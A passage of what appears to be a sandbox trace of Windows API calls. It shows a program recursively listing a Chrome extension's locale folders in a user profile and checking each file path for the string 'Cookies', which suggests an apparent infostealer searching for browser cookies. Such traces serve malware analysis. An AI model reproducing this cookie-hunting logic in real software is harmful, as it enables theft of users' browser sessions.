Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0163.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0163.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*" [0163.362] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.362] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.362] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.362] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.362] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.362] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned 137 [0163.363] lstrlenW (lpString="\\") returned 1 [0163.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0163.363] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\" [0163.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\") returned 138 [0163.363] lstrlenW (lpString="messages.json") returned 13 [0163.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\" [0163.363] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" [0163.363] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json", lpSrch="Cookies") returned 0x0 [0163.363] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.363] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.363] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="pl", cAlternateFileName="")) returned 1 [0163.363] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0163.363] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0163.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.363] lstrlenW (lpString="\\") returned 1 [0163.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.363] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.363] lstrlenW (lpString="pl") returned 2 [0163.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.363] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0163.364] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0163.364] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*" [0163.364] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.364] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.364] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.364] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.364] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.364] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.364] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned 137 [0163.364] lstrlenW (lpString="\\") returned 1 [0163.364] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0163.364] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\" [0163.364] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\") returned 138 [0163.364] lstrlenW (lpString="messages.json") returned 13 [0163.364] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\" [0163.364] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" [0163.364] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.364] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.365] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.365] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0163.365] lstrcmpiW (lpString1="pt_BR", lpString2=".") returned 1 [0163.365] lstrcmpiW (lpString1="pt_BR", lpString2="..") returned 1 [0163.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.365] lstrlenW (lpString="\\") returned 1 [0163.365] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.365] lstrlenW (lpString="pt_BR") returned 5 [0163.365] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0163.365] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0163.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*" [0163.365] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.365] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.365] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.365] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.365] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.366] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.366] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned 140 [0163.366] lstrlenW (lpString="\\") returned 1 [0163.366] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0163.367] 